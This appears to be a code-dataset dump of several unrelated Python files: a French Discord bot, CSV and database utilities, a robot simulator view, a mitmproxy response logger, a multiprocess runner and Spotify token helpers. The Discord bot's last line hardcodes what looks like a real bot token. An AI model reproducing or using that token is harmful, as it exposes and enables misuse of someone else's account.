command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def admincall(ctx):\n message = ctx.message\n author = message.author\n server = author.server\n channel = discord.utils.get(server.channels, name='administration_bot')\n channel_str = str(channel)\n if channel_str == \"administration_bot\":\n channel_id = channel.id\n cmd_str = \"!admincall\"\n em = discord.Embed(title=\"Un administrateur a été appelé.\", colour=0x43b581)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n em3 = discord.Embed(title=message.author.name + \" a appelé un admin dans #\" + message.channel.name, colour=0x43b581)\n em3.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(discord.Object(channel_id), embed=em3)\n print (bcolors.WARNING + \n (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + \n bcolors.ENDC, \"a appelé un admin dans\", bcolors.WARNING + (\"#{}\".format(message.channel.name)) + \n bcolors.ENDC, \"avec succès sur le serveur : \", bcolors.WARNING + message.server.name + bcolors.ENDC)\n else:\n em2 = discord.Embed(title=\"Salon d'administration non trouvé..\", \n description=(\"Le bot a besoin d'un salon **administration_bot** pour fonctionner correctement..\\n\"\n \"Si vous en avez déjà créé un, vérifier que vous l'avez bien orthographié. \"), colour=0xe74c3c)\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n \n@bot.command(pass_context=True)\nasync def ping(ctx):\n cmd_str = \"!ping\"\n message = ctx.message\n author = message.author\n await bot.send_typing(message.channel)\n ping_FR = os.popen(\"ping -c 5 www.google.fr | tail -1| awk '{print $4}' | cut -d '/' -f 2\").read()\n ping_FR = str(ping_FR)\n em = discord.Embed(title=\"Le serveur a \" + ping_FR + \"ms de ping vers Google France\", colour=0x3498db)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def frankyonmyserver(ctx):\n cmd_str = \"!frankyonmyserver\"\n message = ctx.message\n author = message.author\n# await bot.say(\"En cours de dévellopement...\")\n command_logs(cmd_str, author, message)\n em = discord.Embed(title='Franky sur votre serveur !', \n description=(\"Pour ajouter Franky a votre serveur, cliquez \"\n \"**[sur ce lien !](https://discordapp.com/oauth2/authorize?client_id=314031841642414080&scope=bot&permissions=8)**\"), colour=0x43b581)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n\nbot.run('MzE0MDMxODQxNjQyNDE0MDgw.C_yVEQ.W46qusFYjg9-sE2QWzBexfxtvJM')","sub_path":"Franky.py","file_name":"Franky.py","file_ext":"py","file_size_in_byte":16279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"387375415","text":"import csv\nimport json\n\nf =open('Names.csv', 'r')\nreader = csv.reader(f)\ncar = []\nfirstline=True\nfor row in reader:\n if firstline: #First line we will get the header\n firstline=False\n header =[] #Get header of csv file into list########\n for x in row:\n if x : \n header.append(x)\n else:\n break\n continue ###########################################\n \n if not row: #ignore if row empty\n continue\n \n entry = {}\n n = 0\n for field in header:\n entry[field] = row[n]\n n=n+1\n car.append(entry) #append dict into list\n\nprint(header)\nprint(car) #printing list\nwith open('car.json', 'w') as outfile:\n json.dump(car,outfile)","sub_path":"csv_dict_conversion/csv_to_dict.py","file_name":"csv_to_dict.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"241020595","text":"\"\"\"add is_adult_only to topic\n\nRevision ID: 493b84715c67\nRevises: b4364f33391d\nCreate Date: 2018-04-23 17:38:12.708166\n\n\"\"\"\nimport os\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nschema_name = os.getenv('SCHEMA_NAME')\n\n\n# revision identifiers, used by Alembic.\nrevision = '493b84715c67'\ndown_revision = 'b4364f33391d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n with op.batch_alter_table(\"topic\", schema=schema_name) as batch_op:\n batch_op.add_column(\n sa.Column('is_adult_only', sa.Boolean, server_default='False'))\n\n\ndef downgrade():\n with op.batch_alter_table(\"topic\", schema=schema_name) as batch_op:\n batch_op.drop_column('is_adult_only')\n","sub_path":"alembic/versions/493b84715c67_add_is_adult_only_to_topic.py","file_name":"493b84715c67_add_is_adult_only_to_topic.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"421744005","text":"# simu - Robot simulation. {{{\n#\n# Copyright (C) 2009 Nicolas Schodet\n#\n# APBTeam:\n# Web: http://apbteam.org/\n# Email: team AT apbteam DOT org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# }}}\n\"\"\"AquaJim bridge.\"\"\"\nfrom simu.inter.drawable import Drawable\nfrom math import pi, cos, sin\n\nfrom simu.view.table_eurobot2009 import puck_attr\n\nclass Bridge (Drawable):\n\n width = 220\n height = 100\n\n def __init__ (self, onto, model):\n Drawable.__init__ (self, onto)\n self.model = model\n self.model.register (self.update)\n\n def draw (self):\n self.reset ()\n self.trans_rotate (0.95 * pi / 2)\n self.draw_line ((-40, -80), (-40, 80), fill = '#808080')\n self.draw_line ((40, -80), (40, 80), fill = '#808080')\n for i in range (2):\n puck = self.model.bridge_slot[i]\n if puck is not None:\n self.draw_circle ((0, 40 - 80 * i), 35,\n **puck_attr[puck.color])\n if self.model.bridge_door_servo_value is not None:\n self.draw_arc ((0, -40), 37.5, start = -3 * pi / 4\n + self.model.bridge_door_servo_value * pi, extent = pi / 2)\n if self.model.bridge_finger_servo_value is not None:\n self.draw_arc ((-40, -50), 50, start = pi / 2, extent = -3 * pi / 4,\n style = 'arc', outline = '#c0c0c0')\n a = pi / 2 - self.model.bridge_finger_servo_value * 3 * pi / 4\n self.draw_line ((-40, -50), (-40 + 50 * cos (a), -50 + 50 * sin (a)))\n\n","sub_path":"host/simu/robots/aquajim/view/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"647778065","text":"# -*- coding: utf-8 -*-\nimport mitmproxy.http\nimport json\n\n\n# # image = sys.argv[1]\n# runlist = [\n# request.HandleRequest().modify_request(),\n# response.HandleResponse().get_response()\n# ]\n\n# def get_response(flow: mitmproxy.http.HTTPFlow):\n# url = 'http://' + flow.request.host + '/kssearch/submit/oralevaluatesearch'\n# if flow.request.url.startswith(url):\n# print(\"================================正确的呀=========================================\")\n#\n# # 读取测试图片\n# # imagepath = open(r\"../util/testimage.txt\", 'rU').readlines()\n# # path = os.path.dirname(os.path.realpath(__file__))\n# # complete_path = os.path.join(path, imagepath)\n# # picname = os.path.basename(complete_path)\n# # file = open(complete_path, 'rb')\n# # files = {'image': (picname, file, \"application/octet-stream\", {\"Content-Transfer-Encoding\": \"8bit\"})}\n# # flow.request.query.update({\"image\": files})\n# # print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\" + flow.request.query)\n# # print(\"request\" + imagepath)\n# # print(type(imagepath))\n#\n# # 写入接口返回的图片信息\n# text = flow.response.text\n# data_json = json.loads(text)\n# print(\"脚本\")\n# if data_json.get('data'):\n# imginfo = data_json.get('data').get('imageInfo')\n# with open('.\\\\queryinfo.txt', 'a+') as f:\n# f.truncate()\n# print(\"image\")\n# print(str(imginfo))\n# f.write(str(imginfo) + '\\n')\n# f.close()\n#\n# # 写入接口返回的框选坐标\n# if data_json.get('data').get('questionList'):\n# datas = data_json.get('data').get('questionList')\n# with open('.\\\\coordinate.txt', 'w') as f:\n# f.truncate()\n# for data in datas:\n# exptype = data.get('expType')\n# questionType = data.get('questionType')\n# if ((questionType == 1) and (exptype == 2)) or questionType == 2:\n# print(type(data.get('coordinate')))\n# print(data.get('coordinate'))\n# coordinate = data.get('coordinate')\n# f.write(str(coordinate) + '\\n')\n# f.close()\n#\n# # data = json.dumps(text)\n#\n# # ctx.log.info(str(result))\n# else:\n# print(\"else la else la else la else la else la else la else la else la else la else la else la \")\n\n# 所有发出的请求数据包都会被这个方法所处理\n# 所谓的处理,我们这里只是打印一下一些项;当然可以修改这些项的值直接给这些项赋值即可\n# def request(flow):\n# # 获取请求对象\n# request = flow.request\n# # 实例化输出类\n# info = ctx.log.info\n# # 打印请求的url\n# info(request.url)\n# # 打印请求方法\n# info(request.method)\n# # 打印host头\n# info(request.host)\n# # 打印请求端口\n# info(str(request.port))\n# # 打印所有请求头部\n# info(str(request.headers))\n# # 打印cookie头\n# info(str(request.cookies))\n\n# 所有服务器响应的数据包都会被这个方法处理\n# 所谓的处理,我们这里只是打印一下一些项\n# def response(flow):\n# # 获取响应对象\n# response = flow.response\n# # 实例化输出类\n# info = ctx.log.info\n# # 打印响应码\n# info(str(response.status_code))\n# # 打印所有头部\n# info(str(response.headers))\n# # 打印cookie头部\n# info(str(response.cookies))\n# # 打印响应报文内容\n# info(str(response.text))\n\n\n# 设置上游代理\n# def request(self, flow: mitmproxy.http.HTTPFlow):\n# if flow.request.method == \"CONNECT\":\n# return\n# if flow.live:\n# proxy = ('http://121.228.53.238', '9990')\n# print(flow.request.host)\n# flow.live.change_upstream_proxy_server(proxy)\n# str = 'cmd.exe mitmdump -s ./pyscript.py - p 8080'\n# d = os.system('mitmdump')\n# print(d)\n# mitmproxy.mitmdump(str)\n# os.system('mitmweb -s proxyscript.py -p 8082')\n\ndef response(flow: mitmproxy.http.HTTPFlow):\n url = 'http://' + flow.request.host + '/kssearch/submit/oralevaluatesearch'\n if flow.request.url.startswith(url):\n print(\"正确的呀\")\n text = flow.response.text\n data_json = json.loads(text)\n print(\"脚本\")\n if data_json.get('data'):\n imginfo = data_json.get('data').get('imageInfo')\n with open('.\\\\conf\\\\queryinfo.txt', 'w') as f:\n f.truncate()\n print(\"image\")\n print(str(imginfo))\n f.write(str(imginfo) + '\\n')\n f.close()\n if data_json.get('data').get('questionList'):\n datas = data_json.get('data').get('questionList')\n with open('.\\\\conf\\\\coordinate.txt', 'w') as f:\n f.truncate()\n for data in datas:\n exptype = data.get('expType')\n questionType = data.get('questionType')\n if ((questionType == 1) and (exptype == 2)) or questionType == 2:\n print(type(data.get('coordinate')))\n print(data.get('coordinate'))\n coordinate = data.get('coordinate')\n f.write(str(coordinate) + '\\n')\n f.close()\n\n # data = json.dumps(text)\n\n # ctx.log.info(str(result))\n else:\n print(\"else la else la else la else la else la else la else la else la else la else la else la \")\n","sub_path":"AutoUIks/mitmproxyscript.py","file_name":"mitmproxyscript.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"6677552","text":"import torch.multiprocessing as mp\nimport threading\nimport queue\nimport atexit\nimport bisect\nfrom typing import Callable, Iterable, Any\nfrom easycore.common.config import CfgNode as CN\n\n\nclass BaseRunner:\n \"\"\"\n A Multi-process runner whose consumer receive data in unorder. \n The runner will start multi-processes for producers and 1 thread for consumer.\n \"\"\"\n\n class _Producer(mp.Process):\n def __init__(self,\n input_queue,\n output_queue,\n device,\n cfg,\n init_func,\n work_func,\n end_func):\n super(BaseRunner._Producer, self).__init__()\n self.input_queue = input_queue\n self.output_queue = output_queue\n self.device = device\n self.cfg = cfg.copy()\n self.init_func = init_func\n self.work_func = work_func\n self.end_func = end_func\n\n def run(self):\n raise NotImplementedError(\"This is a base runner without implement.\")\n\n class _StopToken:\n pass\n\n class _Consumer(threading.Thread):\n def __init__(self,\n receive_func,\n input_queue,\n output_queue,\n cfg,\n init_func,\n work_func,\n end_func):\n super(BaseRunner._Consumer, self).__init__(daemon=True)\n self.receive_func = receive_func\n self.input_queue = input_queue\n self.output_queue = output_queue\n self.cfg = cfg.copy()\n self.init_func = init_func\n self.work_func = work_func\n self.end_func = end_func\n\n def run(self):\n raise NotImplementedError(\"This is a base runner without implement.\")\n\n class _InitToken:\n pass\n\n class _EndToken:\n pass \n\n class _StopToken:\n pass\n\n def __init__(self,\n devices,\n cfg = CN(),\n queue_scale = 3.0):\n \"\"\"\n Args:\n devices (int or Iterable): If the `devices` is `int`, it will use devices cpu to do\n the work. If the `devices` is an iterable object, such as list, it will use the\n devices specified by the iterable object, such as [\"cpu\", \"cuda:0\", \"cuda:1\"].\n cfg (easycore.common.config.CfgNode): user custom data.\n queue_scale (float): scale the queues for communication between processes.\n \"\"\"\n # get devices\n if isinstance(devices, int):\n self.devices = [\"cpu\" for _ in range(devices)]\n elif isinstance(devices, Iterable):\n self.devices = devices\n else:\n raise Exception(\"parameter `devices` must be int or Iterable.\")\n\n self.cfg = cfg\n self.queue_scale = queue_scale\n\n self._is_activate = False\n self.activate()\n \n atexit.register(self.close)\n\n @property\n def is_activate(self):\n \"\"\" whether the runner is alive. \"\"\"\n return self._is_activate\n\n @staticmethod\n def producer_init(device, cfg):\n \"\"\" \n function for producer initialization.\n \n Args:\n device (str): device for the this process.\n cfg (easycore.common.config.CfgNode): config of this process, you can use it to transfer data\n to `producer_work` and `producer_end` function.\n \"\"\"\n pass\n\n @staticmethod\n def producer_work(device, cfg, data):\n \"\"\" \n function specify how the producer processes the data.\n \n Args:\n device (str): device for this process.\n cfg (easycore.common.config.CfgNode): config of this process, you can use it to get data from\n `producer_init` function and transfer data to the next `producer_work` and `producer_end`\n function.\n data (Any): data get from input of `__call__` method.\n \n Returns:\n Any: processed data\n \"\"\"\n return data\n\n @staticmethod\n def producer_end(device, cfg):\n \"\"\" \n function after finishing all of its task and before close the process.\n \n Args:\n device (str): device for this process.\n cfg (easycore.common.config.CfgNode): config of this process, you can use it to get data\n from `producer_init` and `producer_work` function.\n \"\"\"\n pass\n\n @staticmethod\n def consumer_init(cfg):\n \"\"\"\n function for consumer initialization.\n \n Args:\n cfg (easycore.common.config.CfgNode): config of this process, you can use it to transfer data\n to `consumer_work` and `consumer_end` function.\n \"\"\"\n pass\n\n @staticmethod\n def consumer_work(cfg, data):\n \"\"\"\n function specify how the consumer processses the data from producers.\n \n Args:\n cfg (easycore.common.config.CfgNode): config of this process, you can use it to get data from\n `consumer_init` function and transfer data to the next `consumer_work` and `consumer_end`\n function.\n \"\"\"\n pass\n\n @staticmethod\n def consumer_end(cfg):\n \"\"\"\n function after receiving all data from producers.\n \n Args:\n cfg (easycore.common.config.CfgNode): config of this process, you can use it get data from\n `consumer_work` function.\n\n Returns:\n Any: processed data\n \"\"\"\n return None\n\n def __call__(self, data_iter):\n \"\"\"\n Args:\n data_iter (Iterable): iterator of data\n \n Returns:\n Any: result\n \"\"\"\n if not self.is_activate:\n raise Exception(\"The runner is closed. Please activate it.\")\n\n # inform the consumer to initialize\n self._put_into_consumer(self._Consumer._InitToken())\n\n # put data to producer\n for data in data_iter:\n self._put_into_producer(data)\n self._put_into_consumer(None) # inform the consumer to process 1 data\n\n # inform the consumer to return result\n self._put_into_consumer(self._Consumer._EndToken())\n\n # get result from consumer\n data = self._get_from_consumer()\n return data\n\n def __del__(self):\n self.close()\n\n def close(self):\n \"\"\"\n Shutdown all processes if this runner is alive.\n \"\"\"\n if self.is_activate:\n self._is_activate = False\n # stop workers\n for _ in self.devices:\n self.producer_input_queue.put(self._Producer._StopToken())\n self.consumer_input_queue.put(self._Consumer._StopToken())\n\n # join workers\n for producer in self.producers:\n producer.join()\n self.consumer.join()\n\n # delete resources\n del self.producer_input_queue\n del self.producer_output_queue\n del self.consumer_input_queue\n del self.consumer_output_queue\n del self.producers\n del self.consumer\n\n\n def activate(self):\n \"\"\"\n Restart all processes if this runner is closed.\n \"\"\"\n if not self.is_activate:\n self._is_activate = True\n # init queues for communication between processes\n self.producer_input_queue = mp.Queue(maxsize = int(len(self.devices) * self.queue_scale))\n self.producer_output_queue = mp.Queue(maxsize = int(len(self.devices) * self.queue_scale))\n self.consumer_input_queue = queue.Queue(maxsize = int(len(self.devices) * self.queue_scale))\n self.consumer_output_queue = queue.Queue(maxsize = 1)\n\n # create workers\n self.producers = []\n for device in self.devices:\n self.producers.append(\n self._Producer(\n self.producer_input_queue,\n self.producer_output_queue,\n device,\n self.cfg,\n self.producer_init,\n self.producer_work,\n self.producer_end))\n self.consumer = self._Consumer(\n self._get_from_producer,\n self.consumer_input_queue,\n self.consumer_output_queue,\n self.cfg,\n self.consumer_init,\n self.consumer_work,\n self.consumer_end)\n\n # start workers\n for producer in self.producers:\n producer.start()\n self.consumer.start()\n\n\n def _put_into_producer(self, data):\n self.producer_input_queue.put(data)\n \n def _get_from_producer(self):\n return self.producer_output_queue.get()\n\n def _put_into_consumer(self, data):\n self.consumer_input_queue.put(data)\n \n def _get_from_consumer(self):\n data = self.consumer_output_queue.get()\n self.consumer_output_queue.task_done()\n return data\n\n\n\nclass UnorderedRunner(BaseRunner):\n \"\"\"\n A Multi-process runner whose consumer receive data in unorder. \n The runner will start multi-processes for producers and 1 thread for consumer.\n \"\"\"\n class _Producer(BaseRunner._Producer):\n def run(self):\n # initialization\n self.init_func(self.device, self.cfg)\n\n while True:\n data = self.input_queue.get()\n if isinstance(data, self._StopToken):\n break\n\n # decode data and do task\n data = self.work_func(self.device, self.cfg, data)\n\n self.output_queue.put(data)\n\n # end\n self.end_func(self.device, self.cfg)\n\n\n class _Consumer(BaseRunner._Consumer):\n def run(self):\n while True:\n data = self.input_queue.get()\n self.input_queue.task_done()\n if isinstance(data, self._StopToken):\n break\n elif isinstance(data, self._InitToken):\n # initialization\n cfg = self.cfg.copy()\n self.init_func(cfg)\n elif isinstance(data, self._EndToken):\n # end\n data = self.end_func(cfg)\n self.output_queue.put(data)\n del cfg\n else:\n # work\n data = self.receive_func()\n self.work_func(cfg, data)\n\n\n def __init__(self,\n devices,\n cfg = CN(),\n queue_scale = 3.0):\n \"\"\"\n Args:\n devices (int or Iterable): If the `devices` is `int`, it will use devices cpu to do\n the work. If the `devices` is an iterable object, such as list, it will use the\n devices specified by the iterable object, such as [\"cpu\", \"cuda:0\", \"cuda:1\"].\n cfg (easycore.common.config.CfgNode): user custom data.\n queue_scale (float): scale the queues for communication between processes.\n \"\"\"\n super(UnorderedRunner, self).__init__(devices, cfg=cfg, queue_scale=queue_scale)\n\n\n\nclass OrderedRunner(BaseRunner):\n \"\"\" \n A Multi-process runner whose consumer receive data in order. \n The runner will start multi-processes for producers and 1 thread for consumer.\n \"\"\"\n class _Producer(BaseRunner._Producer):\n def run(self):\n # initialization\n self.init_func(self.device, self.cfg)\n\n while True:\n data = self.input_queue.get()\n if isinstance(data, self._StopToken):\n break\n\n # decode data and do task\n id, data = data\n data = self.work_func(self.device, self.cfg, data)\n\n self.output_queue.put((id, data))\n\n # end\n self.end_func(self.device, self.cfg)\n\n\n class _Consumer(BaseRunner._Consumer):\n def run(self):\n while True:\n data = self.input_queue.get()\n self.input_queue.task_done()\n if isinstance(data, self._StopToken):\n break\n elif isinstance(data, self._InitToken):\n # initialization\n cfg = self.cfg.copy()\n self.init_func(cfg)\n elif isinstance(data, self._EndToken):\n # end\n data = self.end_func(cfg)\n self.output_queue.put(data)\n del cfg\n else:\n data = self.receive_func()\n self.work_func(cfg, data)\n\n def __init__(self,\n devices,\n cfg = CN(),\n queue_scale = 3.0):\n \"\"\"\n Args:\n devices (int or Iterable): If the `devices` is `int`, it will use devices cpu to do\n the work. If the `devices` is an iterable object, such as list, it will use the\n devices specified by the iterable object, such as [\"cpu\", \"cuda:0\", \"cuda:1\"].\n cfg (easycore.common.config.CfgNode): user custom data.\n queue_scale (float): scale the queues for communication between processes.\n \"\"\"\n super(OrderedRunner, self).__init__(devices, cfg=cfg, queue_scale=queue_scale)\n\n\n def close(self):\n \"\"\"\n Shutdown all processes if this runner is alive.\n \"\"\"\n if self.is_activate:\n del self._put_id, self._get_id\n del self._id_buffer, self._data_buffer\n\n super(OrderedRunner, self).close()\n\n def activate(self):\n \"\"\"\n Restart all processes if this runner is closed.\n \"\"\"\n if not self.is_activate:\n self._put_id = 0\n self._get_id = 0\n self._id_buffer = []\n self._data_buffer = []\n\n super(OrderedRunner, self).activate()\n\n def _put_into_producer(self, data):\n id = self._put_id\n self._put_id += 1\n self.producer_input_queue.put((id, data))\n \n def _get_from_producer(self):\n if len(self._id_buffer) and self._id_buffer[0] == self._get_id:\n data = self._data_buffer[0]\n del self._id_buffer[0], self._data_buffer[0]\n self._get_id += 1\n return data\n\n while True:\n id, data = self.producer_output_queue.get()\n if id == self._get_id:\n self._get_id += 1\n return data\n insert_position = bisect.bisect(self._id_buffer, id)\n self._id_buffer.insert(insert_position, id)\n self._data_buffer.insert(insert_position, data)\n\n","sub_path":"easycore/torch/parallel/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":14997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"538198351","text":"# -*- coding: utf-8 -*-\n'''\nTesting file\n'''\n\n\n\nFIND_SETTINGS = {\n 'findWiFi': True,\n 'findWiFiNe': True,\n 'findWiFiPar': True,\n 'findWiFiHu': False,\n 'findWiFiWe': False,\n 'findBACnet': False,\n 'findModbus': False,\n 'findAcquiSuite': False,\n 'findWiFiNet': False,\n 'findSmartThings': False,\n 'findProteus': False,\n 'findWiFiIC': True,\n 'findWiFiHo': True,\n 'findZigBee': True\n\t\n}\n\nDUMMY_SETTINGS = {\n 'dummy_discovery': False,\n 'number_of_hvac': 30,\n 'number_of_lighting': 0,\n 'number_of_plugload': 0,\n 'number_of_sensor': 0,\n 'number_of_powermeter': 0\n}","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"551081181","text":"from requests.api import get\n\nfrom .models import SpotifyToken\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom .credentials import CLIENT_ID,CLIENT_SECRET\nfrom requests import post\n\nBASE_URL = \"https://api.spotify.com/v1/me/\"\n\n\ndef getToken(session_id): \n token= SpotifyToken.objects.filter(user=session_id)\n if token:\n return token[0]\n else:\n return None\ndef isSpotifyAuth(session_id): \n token= getToken(session_id)\n if token: \n if token.expires_in <= timezone.now():\n refreshToken(session_id=session_id) \n return True\n return False\n\ndef update_or_create_user_tokens(session_id, access_token, token_type, expires_in, refresh_token):\n tokens=getToken(session_id)\n expires_in = timezone.now() + timedelta(seconds=expires_in)\n\n if tokens:\n tokens.access_token = access_token\n tokens.refresh_token = refresh_token\n tokens.expires_in = expires_in\n tokens.token_type = token_type\n tokens.save(update_fields=['access_token',\n 'refresh_token', 'expires_in', 'token_type'])\n else:\n tokens = SpotifyToken.objects.create(user=session_id, access_token=access_token,\n refresh_token=refresh_token, token_type=token_type, expires_in=expires_in)\n\n\n \n\n\ndef refreshToken(session_id):\n refresh_token=getToken(session_id).refresh_token\n response=post('https://accounts.spotify.com/api/token',data={\n 'grant_type': 'refresh_token',\n 'refresh_token': refresh_token,\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET\n }).json()\n access_token = response.get('access_token')\n token_type = response.get('token_type')\n expires_in = response.get('expires_in')\n refresh_token = response.get('refresh_token')\n update_or_create_user_tokens(access_token=access_token,token_type=token_type,expires_in=expires_in,refresh_token=refresh_token)\n\ndef send_spotify_api_request(host,endpoint):\n tokens=getToken(host)\n headers = {'Content-Type': 'application/json',\n 'Authorization': \"Bearer \" + tokens.access_token}\n\n response=get(BASE_URL+endpoint,{}, headers=headers)\n try:\n return response.json()\n except:\n return {'Error':'Issue with request'}\n\n\n ","sub_path":"spotify/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"625174507","text":"from flask import Blueprint, render_template, session,\\\n request, g, url_for, redirect\n#from database_func import Item, HTMLText, get_lang, T_SearchHint, T_ItemAttrValue\nimport database_func as db\n#from blueprints import category as bp_category, user as bp_user, item as bp_item\nimport blueprints as bp\nfrom blueprints import user as bp_user\n\nblueprint = Blueprint('home', __name__)\n\ndef inject_this_context():\n t = bp.user.get_base_html_texts()\n t.update(bp.user.get_html_text('search_default', 'valid_start', 'valid_end', 'valid_period', 'yuan'))\n \n return dict(html_texts = t)\n \n#blueprint.context_processor(inject_this_context)\n\n#from memory_profiler import profile, memory_usage\n#import io\n#fp=io.open('/vagrant/memory_profiler.log','w')\n#from memory_profiler import LogFile\n#import sys\n#sys.stdout = LogFile('memory_profile_log')\n#@profile(stream=fp, precision=6)\n@blueprint.route('/')\n#@bp_user.url_language_argument()\ndef home():\n # print('request.path')\n # print(request.path)\n # print(request.referrer)\n # print(session)\n # print(request.url_root)\n \n #this_user = db.User.get_by_uuid('7113c00e468a4ec38d532d522c216ec4')\n #source_user = db.User.get_by_uuid('7876fcbd16bc41249efe738d6d0bd5fb')\n \n #if this_user is not None and source_user is not None:\n # for i in source_user.identities:\n # i.uuid = this_user.uuid\n # i.merge()\n \n category_id = request.args.get('c', None)\n \n categories = []\n # categories = bp.category.get_categories_for_display(p_category_id = category_id)\n items = []\n # items = db.Item.get_by_category(lang = g.l, category_id = category_id)\n search_hints = []\n # search_hints = db.T_SearchHint.get_all_available()\n attr_values = {}\n # attr_values = db.ItemAttrValue.get_by_items(items, g.l)\n \n #print request.user_agent\n return render_template('home.html', title = '',\\\n categories = categories,\\\n items = [i.serialize for i in items],\\\n search_hints = [ h.serialize for h in search_hints ],\\\n attr_values = attr_values\n )\n \n@blueprint.route('/favicon.ico')\ndef favicon():\n return redirect(url_for('static', filename='favicon.ico'))\n","sub_path":"flask/blueprints/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"393381303","text":"from unittest import SkipTest\nfrom tests._cred import TestCaseWithUserCredentials\nfrom ._resources import playlist_id, artist_ids, user_ids\n\n\nclass TestSpotifyFollow(TestCaseWithUserCredentials):\n \"\"\"\n If current user follows the tested playlist, it is set as a private follow.\n \"\"\"\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n try:\n cls.current_playlist_follow = cls.client.playlist_is_following(\n playlist_id,\n [cls.current_user_id]\n )[0]\n cls.current_artist_follows = cls.client.artists_is_following(\n artist_ids\n )\n cls.current_user_follows = cls.client.users_is_following(\n user_ids\n )\n except Exception as e:\n raise SkipTest('State before tests could not be determined!') from e\n\n def test_playlist_follow(self):\n self.client.playlist_follow(playlist_id)\n\n def test_playlist_unfollow(self):\n self.client.playlist_unfollow(playlist_id)\n\n def test_followed_artists(self):\n self.client.followed_artists()\n\n def test_artists_follow(self):\n self.client.artists_follow(artist_ids)\n\n def test_artists_unfollow(self):\n self.client.artists_unfollow(artist_ids)\n\n def test_users_follow(self):\n self.client.users_follow(user_ids)\n\n def test_users_unfollow(self):\n self.client.users_unfollow(user_ids)\n\n @classmethod\n def tearDownClass(cls):\n if cls.current_playlist_follow:\n cls.client.playlist_follow(playlist_id, public=False)\n else:\n cls.client.playlist_unfollow(playlist_id)\n\n artist_follows = [\n a for i, a in enumerate(artist_ids)\n if cls.current_artist_follows[i]\n ]\n if artist_follows:\n cls.client.artists_follow(artist_follows)\n\n artist_unfollows = [\n a for i, a in enumerate(artist_ids)\n if not cls.current_artist_follows[i]\n ]\n if artist_unfollows:\n cls.client.artists_unfollow(artist_unfollows)\n\n user_follows = [\n u for i, u in enumerate(user_ids)\n if cls.current_user_follows[i]\n ]\n if user_follows:\n cls.client.users_follow(user_follows)\n\n user_unfollows = [\n u for i, u in enumerate(user_ids)\n if not cls.current_user_follows[i]\n ]\n if user_unfollows:\n cls.client.users_unfollow(user_unfollows)\n","sub_path":"tests/client/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"273153781","text":"#\n# Copyright (c) 2017 Advanced Micro Devices, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# 